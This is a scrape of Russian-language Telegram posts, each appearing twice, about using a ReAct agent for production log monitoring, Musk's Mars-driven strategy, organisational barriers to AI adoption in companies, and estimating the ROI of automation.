Но оказалось, можно отдать задачу ReAct боту типа OpenClaw (мы используем версию B2B DarwinClaw). Он может проверять логи хоть каждые 2 минуты. Тонны токенов здесь не тратятся, он также просто делает поиск по ключевым словам. И важно, что он сам может подобрать ключевые слова и обновлять этот набор исходя из типа логов.
Дальше больше - он может не просто сделать reboot, он может исправить проблему прямо в коде, или сделать откат в git, если поймет, что это проблема новой версии 🔥
Ну то есть, по сути это полноценный support+разраб 24x7, работающий за миску токенов. Да, важно прописать ему некоторые правила (когда то-то делай так, когда это делай сяк), по сути, вашу политику работы с Prod.
#КЕЙС
Прочие полезные кейсы:
👉 WP умер, перевёл все сайты на DarwinClaw
👉 Сбор любой публичной статистики
👉 Отказ от Cursor IDE
Подпишись 👉🏻 @aigentto 🤖
И так, раньше надо было использовать различные отдельные инструменты для мониторинга логов (Zabbix и прочее), чтобы в крайнем случае сделать reboot отдельных компонентов или всей системы.
Но оказалось, можно отдать задачу ReAct боту типа OpenClaw (мы используем версию B2B DarwinClaw). Он может проверять логи хоть каждые 2 минуты. Тонны токенов здесь не тратятся, он также просто делает поиск по ключевым словам. И важно, что он сам может подобрать ключевые слова и обновлять этот набор исходя из типа логов.
Дальше больше - он может не просто сделать reboot, он может исправить проблему прямо в коде, или сделать откат в git, если поймет, что это проблема новой версии 🔥
Ну то есть, по сути это полноценный support+разраб 24x7, работающий за миску токенов. Да, важно прописать ему некоторые правила (когда то-то делай так, когда это делай сяк), по сути, вашу политику работы с Prod.
#КЕЙС
Прочие полезные кейсы:
👉 WP умер, перевёл все сайты на DarwinClaw
👉 Сбор любой публичной статистики
👉 Отказ от Cursor IDE
Подпишись 👉🏻 @aigentto 🤖
Все должно вести к одной цели
Все мы давно знаем, что у Маска главной целью является построить колонию на Марсе и сделать человечество мультипланетарной цивилизацией. Многие даже шутят, что Маск сам с Марса, и ему просто очень надо вернуться домой 😀
Но главное, что у Маска все, что он делает, ведет к этой цели:
• SpaceX – собственно ракеты. Чтобы было на чём долететь и чтобы цена доставки килограмма на орбиту падала каждый год.
• Starlink – спутниковый интернет. Не из любви к фермеру в Айдахо, а чтобы у SpaceX был стабильный денежный поток и операционный опыт массового вывода спутников. Бонусом – будущая связь для марсианской колонии.
• Tesla – электрический транспорт. На Марсе с бензоколонками, как вы догадываетесь, туговато. Заодно – полигон для отработки массового производства сложной техники.
• Tesla Energy – накопители энергии. Колониям, марсоходам и системам жизнеобеспечения нужно где-то хранить электричество. На Земле тренируемся, на Марсе применим.
• Boring Company – туннели. Радиация на поверхности Марса такая, что жить лучше под землёй. Логично заранее научиться быстро и дёшево копать.
• Optimus – человекоподобные роботы. Отправлять кожаных мешков обживать радиоактивную пустыню дорого и негуманно. Пусть сначала железные сходят и подготовят жильё.
• Neuralink и xAI — задел на то, что человек, дотащенный до Марса, должен будет работать в условиях, к которым эволюция его, мягко говоря, не готовила. Хорошо иметь под рукой ИИ и прямой нейроинтерфейс – на случай, если что-то пойдёт не так. А оно, как мы понимаем, пойдёт.
Делайте так же, иначе ресурсы и силы будут тратиться впустую 😎
Подпишись 👉🏻 @aigentto 🤖
Все мы давно знаем, что у Маска главной целью является построить колонию на Марсе и сделать человечество мультипланетарной цивилизацией. Многие даже шутят, что Маск сам с Марса, и ему просто очень надо вернуться домой 😀
Но главное, что у Маска все, что он делает, ведет к этой цели:
• SpaceX – собственно ракеты. Чтобы было на чём долететь и чтобы цена доставки килограмма на орбиту падала каждый год.
• Starlink – спутниковый интернет. Не из любви к фермеру в Айдахо, а чтобы у SpaceX был стабильный денежный поток и операционный опыт массового вывода спутников. Бонусом – будущая связь для марсианской колонии.
• Tesla – электрический транспорт. На Марсе с бензоколонками, как вы догадываетесь, туговато. Заодно – полигон для отработки массового производства сложной техники.
• Tesla Energy – накопители энергии. Колониям, марсоходам и системам жизнеобеспечения нужно где-то хранить электричество. На Земле тренируемся, на Марсе применим.
• Boring Company – туннели. Радиация на поверхности Марса такая, что жить лучше под землёй. Логично заранее научиться быстро и дёшево копать.
• Optimus – человекоподобные роботы. Отправлять кожаных мешков обживать радиоактивную пустыню дорого и негуманно. Пусть сначала железные сходят и подготовят жильё.
• Neuralink и xAI — задел на то, что человек, дотащенный до Марса, должен будет работать в условиях, к которым эволюция его, мягко говоря, не готовила. Хорошо иметь под рукой ИИ и прямой нейроинтерфейс – на случай, если что-то пойдёт не так. А оно, как мы понимаем, пойдёт.
Делайте так же, иначе ресурсы и силы будут тратиться впустую 😎
Подпишись 👉🏻 @aigentto 🤖
❤2👍1
Проблемы внедрения AI в компании
Уже давно есть все инструменты - ИИ, ИИ агенты, мультиагентные системы, и наконец паттерн ReAct (OpenClaw). Последний реально может довольно быстро автоматизировать почти любые процессы.
Но реальное внедрение буксует, вот некоторые причины:
👉 Саботаж и отказ сотрудников что-то менять (автокассы в магазинах тоже прошли этот путь), ведь могут по сути автоматизировать и уволить сотрудников.
👉 Нехватка IT-опыта (когда этим занимаются не IT-специалисты, а вайбкодеры)
👉 Отказ IT-специалистов что-то менять (удивительно, но я сталкиваюсь с жутким консерватизмом со стороны самих IT-специалистов)
👉 Боязнь потратить много токенов (жадность?)
Но что показал эксперимент с roll-up компаниями типа Dwelly, оказывается, даже в небольших бизнесах, которые купил новый собственник, можно все перевести на рельсы AI OS под конкретную вертикаль, и прибыльность бизнеса вырастает с 10% до 40% в год (это в Великобритании).
Вывод прост - только владелец может ИИзировать свою компанию, только тот, кто имеет абсолютный интерес и абсолютную власть в своей компании. К сожалению, даже топ-менеджеры здесь не подходят, потому что им выгодно много людей и отсутствие изменений, так они ничем не рискуют.
Либо собственник должен нанять ИТ-драйвера, которому будет выделена доля в компании в случае успеха, и дать ему абсолютную власть, иначе опять не работает. Все остальное - полумеры, пилоты, которые, конечно, дают иногда результат, но чаще нет, чем да.
Еще раз - суть в том, чтобы был человек, владеющий долей в компании и имеющий абсолютную власть. Опыт roll-ups показывает, что иногда сопротивляются даже собственники, а вот когда у тебя купили компанию, то все сопротивление заканчивается.
Если вам интересна тема, поставьте 👂, я напишу про реальные кейсы провалов и успехов.
Подпишись 👉🏻 @aigentto 🤖
Уже давно есть все инструменты - ИИ, ИИ агенты, мультиагентные системы, и наконец паттерн ReAct (OpenClaw). Последний реально может довольно быстро автоматизировать почти любые процессы.
Но реальное внедрение буксует, вот некоторые причины:
👉 Саботаж и отказ сотрудников что-то менять (автокассы в магазинах тоже прошли этот путь), ведь могут по сути автоматизировать и уволить сотрудников.
👉 Нехватка IT-опыта (когда этим занимаются не IT-специалисты, а вайбкодеры)
👉 Отказ IT-специалистов что-то менять (удивительно, но я сталкиваюсь с жутким консерватизмом со стороны самих IT-специалистов)
👉 Боязнь потратить много токенов (жадность?)
Но что показал эксперимент с roll-up компаниями типа Dwelly, оказывается, даже в небольших бизнесах, которые купил новый собственник, можно все перевести на рельсы AI OS под конкретную вертикаль, и прибыльность бизнеса вырастает с 10% до 40% в год (это в Великобритании).
Вывод прост - только владелец может ИИзировать свою компанию, только тот, кто имеет абсолютный интерес и абсолютную власть в своей компании. К сожалению, даже топ-менеджеры здесь не подходят, потому что им выгодно много людей и отсутствие изменений, так они ничем не рискуют.
Либо собственник должен нанять ИТ-драйвера, которому будет выделена доля в компании в случае успеха, и дать ему абсолютную власть, иначе опять не работает. Все остальное - полумеры, пилоты, которые, конечно, дают иногда результат, но чаще нет, чем да.
Еще раз - суть в том, чтобы был человек, владеющий долей в компании и имеющий абсолютную власть. Опыт roll-ups показывает, что иногда сопротивляются даже собственники, а вот когда у тебя купили компанию, то все сопротивление заканчивается.
Если вам интересна тема, поставьте 👂, я напишу про реальные кейсы провалов и успехов.
Подпишись 👉🏻 @aigentto 🤖
👍6🫡1
Проблема автоматизации чего-либо — это не технология
Начну издалека: автоматизация чего-либо — это не новшество: 100+ лет назад человек переходил от лошади к трактору, примерно в то же время — от ручного труда к ткацкому станку и т. д.
Каждый раз производительность росла, и ВВП на душу населения рос, что приводило к увеличению благ на каждого человека. Поэтому страх, что всех уволят, сильно преувеличен, а точнее, это может стать правдой в моменте, но в долгую AI увеличит блага на душу населения, и так или иначе они все равно будут распределены между людьми.
Теперь переместимся чуть ближе в 2014 год: я нанят в "Большой зеленый банк" как Head автоматизации всего QA, то есть автоматизировать все тестирования всех систем компании (200+ очень разношерстных приложений). Тогда еще не было современного AI, хотя эксперимент мы проводили по автоматизации через распознавание экрана с помощью библиотек Google, все на самом деле даже работало, но со скроллами и legacy интерфейсами были проблемы 🤷♂️
Короче, взяли на тот момент уже стандарт BDD+Java+Selenium driver для всего зоопарка Web+Rest API и уникальные всякие штуки для других областей — была там и знаменитая роборука, которая физически тестировала карточки, вставляя их в терминал 🙂
В тот момент проблемой была не технология, хотя с ней были отдельные решаемые сложности. То же самое сейчас - AI не является блокером, в том же паттерне ReAct (читай OpenClaw) может делать 95% дел которые люди делают за компом.
Тогда главной проблемой были люди, а точнее, их интересы: 5 топ-менеджеров компании управляли большими секторами тестирования и с удовольствием выбивали себе огромные бюджеты на найм ручных тестировщиков. Я, по сути, был призван остановить этот бесконечный найм в ручное тестирование и, по факту, стал главным врагом как минимум этих топ-5 менеджеров, а как максимум — всех 2000+ ручных тестировщиков, которые хотели получать зарплату, тыкать кнопки и не очень хотели учить Java и переходить на автоматизацию.
Для понимания накала страстей, в один момент один из этих топ-5 менеджеров то ли в шутку, то ли всерьёз начал на меня кидаться, так сильно я ему мешал 🙂
Я бы хотел сказать, что победили автоматизация и здравый смысл, но так не работает на больших системах, тем не менее через 4 года уровень автоматизации QA вырос с 0 до 30+%, с учетом того, что за это время внедрили еще 10-ки новых приложений и сам объем тестирования вырос в разы. То есть цель автоматизации в 100% была убегающей: вчера 100% — это было 100 000 тестов, завтра — это 200 000 тестов и так далее.
Почему всё-таки получилось сдержать рост ручного труда и, по факту, сэкономить до 300 млн руб. в год на ручном тестировании? Причина была не в том, что я гений автоматизации, причина была не в технологии. Причина была только в том, что мне дали полный ownership, и директор департамента требовал с меня результат, но не лез в то, как и с помощью чего я буду это делать: вначале там была технология и команда из XIX века, я её убрал за один день, несмотря на большую любовь многих к этой технологии и команде, а любовь была потому, что ребята были приятные и никого сильно не напрягали.
И главное — директор департамента дал мне право на внедрение изменений и всегда его поддерживал. Да, конечно, я не шел напролом, я договаривался с теми 5 топ-менеджерами, но у меня было абсолютное право финального решения по всем вопросам автоматизации.
Только полный ownership и право принимать финальные решения по вопросам в моей зоне ответственности позволили добиться большого результата.
Следующими постами я расскажу, как проваливают текущую AI-автоматизацию большие и малые компании. Нельзя просто дать денег и не дать ownership. Нельзя просто нанять ИТшников, чтобы они сделали инструмент, и все: они его сделают, но он будет лежать в сторонке, и деньги будут потрачены зря.
Подпишись 👉🏻 @aigentto 🤖
Начну издалека: автоматизация чего-либо — это не новшество: 100+ лет назад человек переходил от лошади к трактору, примерно в то же время — от ручного труда к ткацкому станку и т. д.
Каждый раз производительность росла, и ВВП на душу населения рос, что приводило к увеличению благ на каждого человека. Поэтому страх, что всех уволят, сильно преувеличен, а точнее, это может стать правдой в моменте, но в долгую AI увеличит блага на душу населения, и так или иначе они все равно будут распределены между людьми.
Теперь переместимся чуть ближе в 2014 год: я нанят в "Большой зеленый банк" как Head автоматизации всего QA, то есть автоматизировать все тестирования всех систем компании (200+ очень разношерстных приложений). Тогда еще не было современного AI, хотя эксперимент мы проводили по автоматизации через распознавание экрана с помощью библиотек Google, все на самом деле даже работало, но со скроллами и legacy интерфейсами были проблемы 🤷♂️
Короче, взяли на тот момент уже стандарт BDD+Java+Selenium driver для всего зоопарка Web+Rest API и уникальные всякие штуки для других областей — была там и знаменитая роборука, которая физически тестировала карточки, вставляя их в терминал 🙂
В тот момент проблемой была не технология, хотя с ней были отдельные решаемые сложности. То же самое сейчас - AI не является блокером, в том же паттерне ReAct (читай OpenClaw) может делать 95% дел которые люди делают за компом.
Тогда главной проблемой были люди, а точнее, их интересы: 5 топ-менеджеров компании управляли большими секторами тестирования и с удовольствием выбивали себе огромные бюджеты на найм ручных тестировщиков. Я, по сути, был призван остановить этот бесконечный найм в ручное тестирование и, по факту, стал главным врагом как минимум этих топ-5 менеджеров, а как максимум — всех 2000+ ручных тестировщиков, которые хотели получать зарплату, тыкать кнопки и не очень хотели учить Java и переходить на автоматизацию.
Для понимания накала страстей, в один момент один из этих топ-5 менеджеров то ли в шутку, то ли всерьёз начал на меня кидаться, так сильно я ему мешал 🙂
Я бы хотел сказать, что победили автоматизация и здравый смысл, но так не работает на больших системах, тем не менее через 4 года уровень автоматизации QA вырос с 0 до 30+%, с учетом того, что за это время внедрили еще 10-ки новых приложений и сам объем тестирования вырос в разы. То есть цель автоматизации в 100% была убегающей: вчера 100% — это было 100 000 тестов, завтра — это 200 000 тестов и так далее.
Почему всё-таки получилось сдержать рост ручного труда и, по факту, сэкономить до 300 млн руб. в год на ручном тестировании? Причина была не в том, что я гений автоматизации, причина была не в технологии. Причина была только в том, что мне дали полный ownership, и директор департамента требовал с меня результат, но не лез в то, как и с помощью чего я буду это делать: вначале там была технология и команда из XIX века, я её убрал за один день, несмотря на большую любовь многих к этой технологии и команде, а любовь была потому, что ребята были приятные и никого сильно не напрягали.
И главное — директор департамента дал мне право на внедрение изменений и всегда его поддерживал. Да, конечно, я не шел напролом, я договаривался с теми 5 топ-менеджерами, но у меня было абсолютное право финального решения по всем вопросам автоматизации.
Только полный ownership и право принимать финальные решения по вопросам в моей зоне ответственности позволили добиться большого результата.
Следующими постами я расскажу, как проваливают текущую AI-автоматизацию большие и малые компании. Нельзя просто дать денег и не дать ownership. Нельзя просто нанять ИТшников, чтобы они сделали инструмент, и все: они его сделают, но он будет лежать в сторонке, и деньги будут потрачены зря.
Подпишись 👉🏻 @aigentto 🤖
😎3
ROI по внедрению AI
Как понять, что AI вообще сработает в вашем кейсе, в вашем бизнесе? Нужно считать ROI (Return on Investment) до начала внедрения.
Например, есть задача, которая занимает ~4 часа у сотрудника, сотрудник получает ~100 000 руб., его 4 часа стоят ~2500 руб.
Сотрудник делает задачу раз в неделю. Расход ~10 000 руб. в месяц или ~120 000 руб. в год на эту задачу.
Чтобы автоматизировать эту задачу, например, надо 20 часов AI Dev средней стоимостью 3000 руб. в час. ~60 000 руб.
Тут, если вы опытный руководитель ИТ, то надо умножить этот прогноз на число Pi 🙂 тогда будет 180 000 руб.
Получается, вы вкладываете 180k и получаете 120k, ~66% доходности. Не самая высокая, но приемлемая величина, если таких задач будет много, то вы преуспеете.
Подпишись 👉🏻 @aigentto 🤖
Как понять, что AI вообще сработает в вашем кейсе, в вашем бизнесе? Нужно считать ROI (Return on Investment) до начала внедрения.
Например, есть задача, которая занимает ~4 часа у сотрудника, сотрудник получает ~100 000 руб., его 4 часа стоят ~2500 руб.
Сотрудник делает задачу раз в неделю. Расход ~10 000 руб. в месяц или ~120 000 руб. в год на эту задачу.
Чтобы автоматизировать эту задачу, например, надо 20 часов AI Dev средней стоимостью 3000 руб. в час. ~60 000 руб.
Тут, если вы опытный руководитель ИТ, то надо умножить этот прогноз на число Pi 🙂 тогда будет 180 000 руб.
Получается, вы вкладываете 180k и получаете 120k, ~66% доходности. Не самая высокая, но приемлемая величина, если таких задач будет много, то вы преуспеете.
Подпишись 👉🏻 @aigentto 🤖
💯2